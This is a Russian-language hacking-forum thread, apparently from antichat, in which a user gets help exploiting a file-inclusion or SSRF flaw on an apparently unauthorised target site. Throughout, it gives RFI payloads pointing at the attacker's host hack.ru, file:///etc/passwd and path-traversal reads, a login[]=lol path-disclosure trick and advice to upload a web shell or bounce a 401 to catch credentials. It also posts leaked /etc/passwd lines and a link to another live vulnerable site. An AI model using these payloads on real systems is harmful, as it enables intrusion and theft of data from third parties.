Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).

↑ (https://antichat.live/posts/4000812/)
Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=
http://hack.ru/phpinfo.php
открывает пхп инфо моего сайта(hack).


Так и должно быть.. Ну не совсем может там не инклуд вовсе

↑ (https://antichat.live/posts/4000814/)
Так и должно быть


Ну а как мне увидить phpinfo атакуемого сайта?

↑ (https://antichat.live/posts/4000817/)
Ну а как мне увидить phpinfo атакуемого сайта?


а зачем тебе phpinfo атакуемого сайта?

вопрос вообще про инклуд сначала был

/etc/shells /etc/passwd по классике попробуй проинклудить

↑ (https://antichat.live/posts/4000818/)
а зачем тебе phpinfo атакуемого сайта?
вопрос вообще про инклуд сначала был
/etc/shells /etc/passwd по классике попробуй проинклудить


Так если у него инклуд нахрена это всё,тем более если РФИ

site.com/blablabla=


↑ (https://antichat.live/posts/4000817/)
Ну а как мне увидить phpinfo атакуемого сайта?


site=i.txt

в i.txt

а что если, file:///etc/passwd || http://127.0.0.1:80

↑ (https://antichat.live/posts/4000826/)
site.com/blablabla=
site=i.txt
в i.txt
а что если, file:///etc/passwd ||
http://127.0.0.1:80


в i.txt - открыл как текстовый тхт.

file:///etc/passwd || http://127.0.0.1:80 (http://127.0.0.1/) - нет результатов(((

↑ (https://antichat.live/posts/4000847/)
в i.txt - открыл как текстовый тхт.
file:///etc/passwd ||
http://127.0.0.1:80 (http://127.0.0.1/)
- нет результатов(((


тогда это не инклуд

так ты файл читать можешь локальный?

file:///etc/passwd

/blablabla=../etc/passwd

file:///etc/passwd да вот только что нашел,ток в другом месте

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

/etc/group

crontab:x:102:

Debian-exim:x:103:

mlocate:x:104:

ssh:x:105:

А есть брут??работающий с post запросами?

↑ (https://antichat.live/posts/4000812/)
Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=
http://hack.ru/phpinfo.php
открывает пхп инфо моего сайта(hack).


Просто залей на hack.ru файл phpcode.txt с содержимым и открой в браузере site.com/blablabla=phpcode.txt . Если в странице будет присутствовать только "okay dude" то значит это реально рабочий RFI и осталось только залить шелл. Если в страницу будет тупо включено содержимое phpcode.txt вместе с тегами

На самом деле больше похоже на XSRF. Т.е. сервер site.com получает URL, идет по нему, забирает контент и отдает его уже тебе.

посмотри в логах своего веб сервера на hack.com с каким юзер-агентом он приходит к тебе. можно попробовать в ответ на запрос ему отдать 401-й код - вдруг прилетят авторизационные данные. Если бы была винда - смог бы отрелеиться.

file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше

↑ (https://antichat.live/posts/4001055/)
file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше


ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то

↑ (https://antichat.live/posts/4001058/)
ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то


вот вот("и зачем читать passwd когда у него RFI?")

тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents

"На самом деле я лично не одну такую уязвимость не нашёл, только в тасках"

да ладно, вчера такую нашел, просто искать надо правда там не lfi а чтение файлов через fopen, но всё же

тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт

↑ (https://antichat.live/posts/4001081/)
вот вот("и зачем читать passwd когда у него RFI?")
тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents
"На самом деле я лично не одну такую уязвимость не нашёл, только в тасках"
да ладно, вчера такую нашел, просто искать надо
правда там не lfi а чтение файлов через fopen, но всё же
тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт


Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.

↑ (https://antichat.live/posts/4001083/)
Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.


нуу лень она двигатель типа))

http://dantant.com/proxy/miniProxy.php/http://google.com/

для примера, прокся типа, хотя по факту читалка файлов сам ещё толком не крутил, там какая то свалка на домене)

↑ (https://antichat.live/posts/4001094/)
нуу лень она двигатель типа))
http://dantant.com/proxy/miniProxy.php/http://google.com/
для примера, прокся типа, хотя по факту читалка файлов
сам ещё толком не крутил, там какая то свалка на домене)


Живого места на том сайте нету, инклуд нашёл, и заливку файлов, но версия пхп высокая

И много таких прикольных моментов. Но почему я только сейчас стал обращать на это внимания

п.с спасибо за сыль, будет чем заняться на досуге

Кидай таргет в ЛС.

↑ (https://antichat.live/posts/4000919/)
file:///etc/passwd да вот только что нашел,ток в другом месте
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
/etc/group
crontab:x:102:
Debian-exim:x:103:
mlocate:x:104:
ssh:x:105:
А есть брут??работающий с post запросами?


Значит смотри, если у тебя получилось прочитать локальный файл, ищи раскрытие путей например

пост в авторизации

site.com/login

post data

login[]=lol

дает нам /var/www/site.com/public_html/lol/db.php error 31 line

тогда мы имеем следующую возможность чтения

file:///var/www/site.com/public_html/index.php